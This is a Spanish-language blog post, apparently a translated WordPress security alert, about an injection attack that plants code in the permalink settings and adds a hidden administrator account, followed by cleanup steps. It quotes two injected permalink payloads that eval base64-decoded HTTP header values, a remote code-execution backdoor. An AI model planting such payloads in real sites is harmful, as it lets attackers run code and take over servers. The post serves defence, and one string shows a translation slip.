Muchos sitios web se han visto afectados por ataques SQL recientes en los que se inyecta código en su sitio web. Esta inyección de MySQL afecta sus enlaces permanentes al invalidarlos. Por lo tanto, la URL de su publicación de blog no funcionará. Muchos blogs de WordPress fueron objeto de este ataque, gracias a Andy Soward por llamarnos la atención.

Como resultado de este ataque, se agrega uno de los siguientes códigos a su estructura de enlaces permanentes:

%&({${eval(base64_decode($_SERVIDOR[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Estas citas se adjuntan a todos los enlaces permanentes de su sitio y solo se pueden cambiar eliminándolas manualmente.

Para resolver este problema, visite:

Configuración> Enlaces permanentes y elimine el código anterior y reemplace su código predeterminado.

Lo siguiente que debe hacer es ir al usuario. Verás que hay varios administradores. No verá sus nombres en la lista, pero verá que su número aumenta. Entonces, lo que debe hacer es mirar a todos los usuarios y encontrar el último usuario registrado. Pase el cursor sobre el usuario y obtenga el enlace. Cambie el código userid= agregando 1 al número. Entonces, si el último usuario que puede ver es el usuario n. ° 2, agregue 1 y conviértalo en 3. Debería encontrar que el administrador oculto tiene un código extraño como nombre. Elimine el código y conviértalo en suscriptor. Luego regresa y bórralo.

Esto debería funcionar. También puede eliminarlo simplemente yendo a su PHPMyAdmin. Porque verás usuarios allí.

Solo queríamos publicar esto lo antes posible para actualizar a nuestros usuarios. Asegúrate de comprobar que tu blog no está infectado. Esperamos que WordPress sea lanzado pronto.

Además, si no ha implementado algunas de estas medidas para proteger su área de administración de WordPress.

Los datos expuestos en este sitio web son de índole informativo, no necesariamente están actualizados. Esta información es una recopilación de información de internet.